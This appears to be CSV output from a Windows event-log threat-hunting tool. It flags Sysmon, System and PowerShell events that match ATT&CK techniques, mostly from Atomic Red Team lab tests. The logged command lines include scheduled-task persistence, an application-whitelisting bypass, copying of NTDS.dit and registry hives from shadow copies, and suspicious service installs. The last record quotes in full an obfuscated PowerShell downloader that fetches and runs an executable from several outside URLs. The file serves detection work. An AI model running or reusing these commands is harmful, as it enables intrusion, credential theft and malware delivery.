),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4096 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:52.784 + 747F3D96-DA70-5D31-0000-001007293F00 + 608 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a C:\Windows\system32\javacpl.cpl" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1202] Indirect Command Execution,1563548272.92361,2019-07-19T18:57:52.923610+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried accessing powershell history through commandline ( pcalua.exe -a Java ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4095 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:50.232 + 747F3D96-DA6E-5D31-0000-001081F93E00 + 1284 + C:\Windows\System32\pcalua.exe + 10.0.17763.1 (WinBuild.160101.0800) + Program Compatibility Assistant + Microsoft® Windows® Operating System + Microsoft Corporation + pcalua.exe -a Java + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=E6A15B8FF17F8656458581FC0B97B0852F69F362,MD5=1E9E8B2CFCFDA570B5E07C014770A1B3,SHA256=36EF04735ADFFF417AE761BF6595BADB54A4CCEB3550ABA7CFD4F7234C90EE7D,IMPHASH=9580FB84ACAA83C6D353A5A1F7F5E653 + 747F3D96-DA6E-5D31-0000-0010D8F63E00 + 3316 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a Java" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548270.45384,2019-07-19T18:57:50.453840+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a Java" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4094 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:50.198 + 747F3D96-DA6E-5D31-0000-0010D8F63E00 + 3316 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a Java" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1202] Indirect Command Execution,1563548270.398446,2019-07-19T18:57:50.398446+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried accessing powershell history through commandline ( pcalua.exe -a -c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4093 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:47.232 + 747F3D96-DA6B-5D31-0000-00102DD33E00 + 5348 + C:\Windows\System32\pcalua.exe + 10.0.17763.1 (WinBuild.160101.0800) + Program Compatibility Assistant + Microsoft® Windows® Operating System + Microsoft Corporation + pcalua.exe -a -c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=E6A15B8FF17F8656458581FC0B97B0852F69F362,MD5=1E9E8B2CFCFDA570B5E07C014770A1B3,SHA256=36EF04735ADFFF417AE761BF6595BADB54A4CCEB3550ABA7CFD4F7234C90EE7D,IMPHASH=9580FB84ACAA83C6D353A5A1F7F5E653 + 747F3D96-DA6B-5D31-0000-0010CCD03E00 + 5332 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a -c" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548267.238555,2019-07-19T18:57:47.238555+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a -c" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4092 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:47.195 + 747F3D96-DA6B-5D31-0000-0010CCD03E00 + 5332 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a -c" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548267.218345,2019-07-19T18:57:47.218345+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4091 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:46.915 + 747F3D96-DA6A-5D31-0000-00104BC83E00 + 888 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1563548266.92729,2019-07-19T18:57:46.927290+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN " Atomic "task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4090 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Persistence - Scheduled Task Management + 2019-07-19 14:57:46.845 + 747F3D96-DA6A-5D31-0000-0010C5C43E00 + 3352 + C:\Windows\System32\schtasks.exe + 10.0.17763.1 (WinBuild.160101.0800) + Task Scheduler Configuration Tool + Microsoft® Windows® Operating System + Microsoft Corporation + SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN " Atomic "task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10 + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69 + 747F3D96-DA6A-5D31-0000-001074C23E00 + 3872 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN " Atomic "task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548266.84987,2019-07-19T18:57:46.849870+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN " Atomic "task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4089 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:46.814 + 747F3D96-DA6A-5D31-0000-001074C23E00 + 3872 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN " Atomic "task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1563549125.755598,2019-07-19T19:12:05.755598+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4135 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:50.383 + 747F3D96-DDB6-5D31-0000-0010273D4C00 + 3952 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-0020FF090500 + 0x509ff + 1 + Medium + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-D4A4-5D31-0000-0010DD6D0000 + 804 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k DcomLaunch -p + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563549125.755598,2019-07-19T19:12:05.755598+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4135 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:50.383 + 747F3D96-DDB6-5D31-0000-0010273D4C00 + 3952 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-0020FF090500 + 0x509ff + 1 + Medium + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-D4A4-5D31-0000-0010DD6D0000 + 804 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k DcomLaunch -p + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1563549125.755598,2019-07-19T19:12:05.755598+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4135 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:50.383 + 747F3D96-DDB6-5D31-0000-0010273D4C00 + 3952 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-0020FF090500 + 0x509ff + 1 + Medium + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-D4A4-5D31-0000-0010DD6D0000 + 804 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k DcomLaunch -p + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549087.258254,2019-07-19T19:11:27.258254+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4133 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:27.220 + 747F3D96-DD9F-5D31-0000-001041504B00 + 6508 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549087.233257,2019-07-19T19:11:27.233257+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4132 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:27.192 + 747F3D96-DD9F-5D31-0000-00102D4D4B00 + 976 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549087.202862,2019-07-19T19:11:27.202862+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4131 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:27.156 + 747F3D96-DD9F-5D31-0000-00101A4A4B00 + 5772 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549087.169217,2019-07-19T19:11:27.169217+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4130 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:27.069 + 747F3D96-DD9F-5D31-0000-00107B454B00 + 3344 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Service installed in the system,1557665564.155703,2019-05-12T16:52:44.155703+04:00,,Audit,High,"Service installed in the system with Name ( WinPwnage ) , File Name ( %COMSPEC% /c ping -n 1 127.0.0.1 >nul && echo 'WinPwnage' > \\.\pipe\WinPwnagePipe ) , Service Type ( user mode service ) , Service Start Type ( demand start ) , Service Account ( LocalSystem )",7045," + + + + + 7045 + 0 + 4 + 0 + 0 + 0x8080000000000000 + + + 10446 + + + + + System + IEWIN7 + + + + + WinPwnage + %COMSPEC% /c ping -n 1 127.0.0.1 >nul && echo 'WinPwnage' > \\.\pipe\WinPwnagePipe + user mode service + demand start + LocalSystem + +",IEWIN7,System +cobalt strike service detected installed in the system,1557665564.155703,2019-05-12T16:52:44.155703+04:00,,Threat,Critical,cobalt strike or meterpreter service detected installed in the system,7045," + + + + + 7045 + 0 + 4 + 0 + 0 + 0x8080000000000000 + + + 10446 + + + + + System + IEWIN7 + + + + + WinPwnage + %COMSPEC% /c ping -n 1 127.0.0.1 >nul && echo 'WinPwnage' > \\.\pipe\WinPwnagePipe + user mode service + demand start + LocalSystem + +",IEWIN7,System +Service installed in the system,-11644473600.0,1601-01-01T04:00:00+04:00,,Audit,High,"Service installed in the system with Name ( remotesvc ) , File Name ( calc.exe ) , Service Type ( user mode service ) , Service Start Type ( auto start ) , Service Account ( LocalSystem )",7045," + + + + + 7045 + 0 + 4 + 0 + 0 + 0x8080000000000000 + + + 6045 + + + + + System + WIN-77LTAPHIQ1R.example.corp + + + + + remotesvc + calc.exe + user mode service + auto start + LocalSystem + +",WIN-77LTAPHIQ1R.example.corp,System +System Logs Cleared,-11644473600.0,1601-01-01T04:00:00+04:00,,Audit,High,System Logs Cleared,104," + + + + + 104 + 0 + 4 + 104 + 0 + 0x8000000000000000 + + + 27736 + + + + + System + PC01.example.corp + + + + + + user01 + EXAMPLE + System + + + +",PC01.example.corp,System +Service installed in the system,1551605354.168476,2019-03-03T13:29:14.168476+04:00,,Audit,High,"Service installed in the system with Name ( spoolsv ) , File Name ( cmd.exe ) , Service Type ( user mode service ) , Service Start Type ( auto start ) , Service Account ( LocalSystem )",7045," + + + + + 7045 + 0 + 4 + 0 + 0 + 0x8080000000000000 + + + 4482 + + + + + System + WIN-77LTAPHIQ1R.example.corp + + + + + spoolsv + cmd.exe + user mode service + auto start + LocalSystem + +",WIN-77LTAPHIQ1R.example.corp,System +Service installed in the system,1551605038.85688,2019-03-03T13:23:58.856880+04:00,,Audit,High,"Service installed in the system with Name ( spoolfool ) , File Name ( cmd.exe ) , Service Type ( user mode service ) , Service Start Type ( auto start ) , Service Account ( LocalSystem )",7045," + + + + + 7045 + 0 + 4 + 0 + 0 + 0x8080000000000000 + + + 4480 + + + + + System + WIN-77LTAPHIQ1R.example.corp + + + + + spoolfool + cmd.exe + user mode service + auto start + LocalSystem + +",WIN-77LTAPHIQ1R.example.corp,System +Powershell Executing Pipeline - Suspicious Powershell Commands detected,1598418573.34971,2020-08-26T09:09:33.349710+04:00,,Threat,Critical,"Found User (DESKTOP-RIPCLIP\Clippy) run Suspicious PowerShell commands that include (Net.WebClient,Net.WebClient,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,Net.WebClient,\Windows\System32) in event with Command Line ($Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(Get-Item): "Get-Item") and full command (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) ",800," + + + + + 800 + 0 + 4 + 8 + 0 + 0x80000000000000 + + + 789 + + + + + Windows PowerShell + DESKTOP-RIPCLIP + + + + + $Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') 